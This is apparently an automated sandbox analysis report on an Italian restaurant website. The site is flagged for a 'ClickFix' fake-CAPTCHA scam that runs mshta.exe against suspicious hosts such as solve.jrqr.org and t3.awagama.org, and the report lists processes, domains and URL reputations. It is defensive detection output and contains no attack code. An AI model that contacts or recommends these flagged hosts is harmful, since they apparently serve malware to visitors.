    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583836 URL: http://www.cipassoitalia.it/ Startdate: 03/01/2025 Architecture: WINDOWS Score: 64 47 solve.jrqr.org 2->47 49 www.cloudflare.com 2->49 51 3 other IPs or domains 2->51 67 Suricata IDS alerts for network traffic 2->67 69 Detect drive by download via clipboard copy & paste 2->69 71 Yara detected CAPTCHA Scam ClickFix 2->71 8 chrome.exe 9 2->8         started        11 mshta.exe 16 2->11         started        13 iexplore.exe 73 104 2->13         started        15 chrome.exe 2->15         started        signatures3 process4 dnsIp5 53 192.168.2.16, 443, 49708, 49709 unknown unknown 8->53 55 239.255.255.250 unknown Reserved 8->55 17 chrome.exe 8->17         started        57 solve.jrqr.org 104.21.27.98 CLOUDFLARENETUS United States 11->57 59 t3.awagama.org 188.114.97.3 CLOUDFLARENETUS European Union 11->59 20 msedge.exe 97 372 13->20         started        22 iexplore.exe 25 50 13->22         started        24 iexplore.exe 51 13->24         started        26 ssvagent.exe 501 13->26         started        process6 dnsIp7 37 mc.yandex.ru 77.88.21.119, 443, 49822 YANDEXRU Russian Federation 17->37 39 87.250.251.119 YANDEXRU Russian Federation 17->39 45 28 other IPs or domains 17->45 28 msedge.exe 20 20->28         started        31 msedge.exe 20->31         started        33 msedge.exe 20->33         started        35 ssvagent.exe 22->35         started        41 www.cloudflare.com 104.16.124.96 CLOUDFLARENETUS United States 24->41 43 static.cloudflareinsights.com 104.16.80.73 CLOUDFLARENETUS United States 24->43 process8 dnsIp9 61 googlehosted.l.googleusercontent.com 142.250.185.97 GOOGLEUS United States 28->61 63 chrome.cloudflare-dns.com 162.159.61.3 CLOUDFLARENETUS United States 28->63 65 6 other IPs or domains 28->65

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    http://www.cipassoitalia.it/0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://blog.christoffer.me/six-things-i-learnt-about-ios-safaris-rubber-band-scrolling/0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons_fullwidth/buttons_fullwidth.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/xmlrpc.php0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/?lang=en0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/uploads/2019/06/sfondo_cerchi.png0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-wpml/wpml-mod.css?ver=4.50%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/table/table.css?ver=6.0.90%Avira URL Cloudsafe
    https://t3.awagama.org/cdn-cgi/styles/cf.errors.cssWy0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=6.0.90%Avira URL Cloudsafe
    https://t3.awagama.org/cdn-cgi/styles/cf.errors.cssX0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconbox/iconbox.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-snippet-sticky-header.js?ver=4.50%Avira URL Cloudsafe
    https://t3.awagama.org/mima.mp4rn0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.05.png0%Avira URL Cloudsafe
    http://artsy.github.io/blog/2012/10/18/so-you-want-to-do-a-css3-3d-transform/0%Avira URL Cloudsafe
    https://t3.awagama.org/cdn-cgi/styles/cf.errors.css5_0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/social_0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.10%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongri0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/#website0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.50%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.53-1222x630.png0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfol0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/content0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobo0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/comments/feed/0%Avira URL Cloudsafe
    https://www.cipassoitalia.it0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/uploads/2024/08/Servizio-di-sala-845x684.jpg0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/postsli0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/hr/hr.c0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-json/0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-192x192.png0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/catalogue/catalogue.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-270x270.png0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.css?ver=6.0.90%Avira URL Cloudsafe
    https://privacy-pienissimo.s3.eu-central-1.amazonaws.com/informativa/uzuypfb7d33r7lvcjvw37oharuqxwlg0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/?s=0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=6.0.90%Avira URL Cloudsafe
    https://forms.pienissimo.com/runtime-es2015.66c79b9d36e7169e27b0.js0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-includes/js/wp-emoji-release.min.js?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.19.49-845x576.p0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/uploads/2022/09/CIPASSO_logo_600_nopoff_-300x143.png0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/js/shortcodes.js?ver=4.50%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_h0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_feature_image/slideshow_feature_image.css?ver=6.0.90%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/blog/bl0%Avira URL Cloudsafe
    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=6.0.90%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    mira-tmc.tm-4.office.com
    52.123.243.76
    truefalse
      high
      mc.yandex.ru
      77.88.21.119
      truefalse
        high
        t3.awagama.org
        188.114.97.3
        truefalse
          high
          chrome.cloudflare-dns.com
          162.159.61.3
          truefalse
            high
            static.cloudflareinsights.com
            104.16.80.73
            truefalse
              high
              plus.l.google.com
              142.250.181.238
              truefalse
                high
                d37vrkxza2boa5.cloudfront.net
                18.245.60.78
                truefalse
                  unknown
                  solve.jrqr.org
                  104.21.27.98
                  truetrue
                    unknown
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      s3-r-w.eu-central-1.amazonaws.com
                      3.5.135.206
                      truefalse
                        high
                        scontent.xx.fbcdn.net
                        157.240.252.13
                        truefalse
                          high
                          enginev2.pienissimo.com
                          3.124.71.130
                          truefalse
                            high
                            play.google.com
                            216.58.206.78
                            truefalse
                              high
                              www.cloudflare.com
                              104.16.124.96
                              truefalse
                                high
                                a37dd8b3f3000a75e.awsglobalaccelerator.com
                                15.197.152.159
                                truefalse
                                  unknown
                                  www.google.com
                                  142.250.185.132
                                  truefalse
                                    high
                                    api.ipify.org
                                    172.67.74.152
                                    truefalse
                                      high
                                      www.cipassoitalia.it
                                      89.46.108.67
                                      truefalse
                                        high
                                        unpkg.com
                                        104.17.246.203
                                        truefalse
                                          high
                                          s.w.org
                                          192.0.77.48
                                          truefalse
                                            high
                                            googlehosted.l.googleusercontent.com
                                            142.250.185.97
                                            truefalse
                                              high
                                              data-seed-prebsc-1-s1.bnbchain.org
                                              unknown
                                              unknownfalse
                                                high
                                                mc.yandex.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  pienissimo.s3.eu-central-1.amazonaws.com
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    connect.facebook.net
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      use.fontawesome.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        clients2.googleusercontent.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          bzib.nelreports.net
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            forms.pienissimo.com
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              _8545._https.data-seed-prebsc-1-s1.bnbchain.org
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                apis.google.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  https://www.cloudflare.com/learning/access-management/phishing-attack/false
                                                                    high
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/table/table.css?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons_fullwidth/buttons_fullwidth.css?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/uploads/2019/06/sfondo_cerchi.pngfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-wpml/wpml-mod.css?ver=4.5false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconbox/iconbox.css?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.css?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-snippet-sticky-header.js?ver=4.5false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.05.pngfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.css?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.1false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.25.53-1222x630.pngfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.5false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.css?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=6.0.9false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://mc.yandex.com/clmap/99162160?page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&pointer-click=rn%3A285429440%3Ax%3A40686%3Ay%3A10485%3At%3A658%3Ap%3A%3BAAA%C2%84AA%C2%89AAAA%3AX%3A659%3AY%3A821&browser-info=u%3A1735921984342483081%3Av%3A1551%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Arqnl%3A1%3Ast%3A1735922050&t=gdpr(14)ti(1)false
                                                                      high
                                                                      https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.css?ver=6.0.9false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/catalogue/catalogue.css?ver=6.0.9false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.cloudflare.com/cdn-cgi/rum?false
                                                                        high
                                                                        https://mc.yandex.com/watch/99162160/1?page-url=goal%3A%2F%2Fwww.cipassoitalia.it%2FClick&page-ref=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&hittoken=1735921987_de4791d74275a7a2a61e0f539a567fed3f958a917b537649694aaeea58b3a8b6&browser-info=ar%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A3%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A1%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113306%3Aet%3A1735921987%3Ac%3A1%3Arn%3A689669015%3Arqn%3A2%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921987%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr(14)mc(g-1)clc(0-0-0)rqnt(2)aw(1)rcm(1)cdl(na)eco(42009088)ti(0)&force-urlencoded=1&site-info=%7B%22clientID%22%3A%2221187cdf-b91f-4f27-aae8-45cec9395e7c%22%7Dfalse
                                                                          high
                                                                          https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.css?ver=6.0.9false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.css?ver=6.0.9false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=6.0.9false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://forms.pienissimo.com/runtime-es2015.66c79b9d36e7169e27b0.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.cipassoitalia.it/wp-includes/js/wp-emoji-release.min.js?ver=6.0.9false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=6.0.9false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.cipassoitalia.it/wp-content/uploads/2022/09/CIPASSO_logo_600_nopoff_-300x143.pngfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.css?ver=6.0.9false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.cipassoitalia.it/wp-content/themes/enfold/js/shortcodes.js?ver=4.5false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_feature_image/slideshow_feature_image.css?ver=6.0.9false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.pngfalse
                                                                            high
                                                                            https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=6.0.9false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                            http://blog.christoffer.me/six-things-i-learnt-about-ios-safaris-rubber-band-scrolling/chromecache_582.1.dr, chromecache_577.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.cipassoitalia.it/xmlrpc.phpchromecache_644.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.cipassoitalia.it/?lang=enchromecache_644.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://deff.nelreports.net/api/report?cat=msnReporting and NEL.22.drfalse
                                                                              high
                                                                              https://ampcid.google.com/v1/publisher:getClientIdchromecache_605.1.dr, chromecache_499.1.drfalse
                                                                                high
                                                                                https://docs.google.com/manifest.json.21.drfalse
                                                                                  high
                                                                                  https://t3.awagama.org/cdn-cgi/styles/cf.errors.cssWymshta.exe, 0000000C.00000002.2411657408.000001A0F655F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://t3.awagama.org/cdn-cgi/styles/cf.errors.cssXmshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                    high
                                                                                    https://t3.awagama.org/mima.mp4rnmshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://artsy.github.io/blog/2012/10/18/so-you-want-to-do-a-css3-3d-transform/chromecache_652.1.dr, chromecache_434.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://i.y.qq.com/n2/m/index.html0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                      high
                                                                                      https://www.deezer.com/0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                        high
                                                                                        https://web.telegram.org/0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                          high
                                                                                          https://webaim.org/techniques/css/invisiblecontent/#techniqueschromecache_484.1.drfalse
                                                                                            high
                                                                                            https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/social_chromecache_644.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://t3.awagama.org/cdn-cgi/styles/cf.errors.css5_mshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrichromecache_644.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://drive-daily-2.corp.google.com/manifest.json.21.drfalse
                                                                                              high
                                                                                              https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.21.drfalse
                                                                                                high
                                                                                                https://github.com/imakewebthings/waypoints/blog/master/licenses.txtchromecache_582.1.dr, chromecache_577.1.drfalse
                                                                                                  high
                                                                                                  https://drive-daily-5.corp.google.com/manifest.json.21.drfalse
                                                                                                    high
                                                                                                    http://gmpg.org/xfn/11chromecache_644.1.drfalse
                                                                                                      high
                                                                                                      https://www.cipassoitalia.it/#websitechromecache_644.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonrychromecache_644.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.cloudflare.com/5xx-error-landingmshta.exe, 0000000C.00000002.2419552191.000001A8F9187000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.22.drfalse
                                                                                                          high
                                                                                                          https://schema.org/WPHeaderchromecache_644.1.drfalse
                                                                                                            high
                                                                                                            https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contentchromecache_644.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolchromecache_644.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://kriesi.atchromecache_441.1.dr, chromecache_491.1.drfalse
                                                                                                              high
                                                                                                              https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobochromecache_644.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://chrome.google.com/webstore/manifest.json0.21.drfalse
                                                                                                                high
                                                                                                                https://www.cipassoitalia.it/wp-content/uploads/2024/08/Servizio-di-sala-845x684.jpgchromecache_644.1.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/postslichromecache_644.1.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/mshta.exe, 0000000C.00000002.2411657408.000001A0F65CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.cipassoitalia.it/comments/feed/chromecache_644.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.cipassoitalia.itchromecache_644.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/hr/hr.cchromecache_644.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggleschromecache_644.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-270x270.pngchromecache_644.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.cipassoitalia.it/wp-json/chromecache_644.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.cipassoitalia.it/wp-content/uploads/2019/05/cropped-Cipasso_Simbolo-192x192.pngchromecache_644.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://outlook.live.com/mail/0/0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                                                    high
                                                                                                                    https://www.cloudflare.com/learning/access-management/phishing-attack/~mshta.exe, 0000000C.00000002.2411657408.000001A0F65F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contactchromecache_644.1.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://privacy-pienissimo.s3.eu-central-1.amazonaws.com/informativa/uzuypfb7d33r7lvcjvw37oharuqxwlgchromecache_505.1.dr, chromecache_519.1.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://www.twitter.com/msapplication.xml6.14.drfalse
                                                                                                                        high
                                                                                                                        https://www.cipassoitalia.it/?s=chromecache_644.1.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://gaana.com/0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                                                          high
                                                                                                                          https://outlook.live.com/mail/compose?isExtension=true0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true0697c2b3-f033-45a4-b104-b0c0c5ea3a7d.tmp.21.drfalse
                                                                                                                              high
                                                                                                                              https://apis.google.comchromecache_426.1.dr, chromecache_510.1.drfalse
                                                                                                                                high
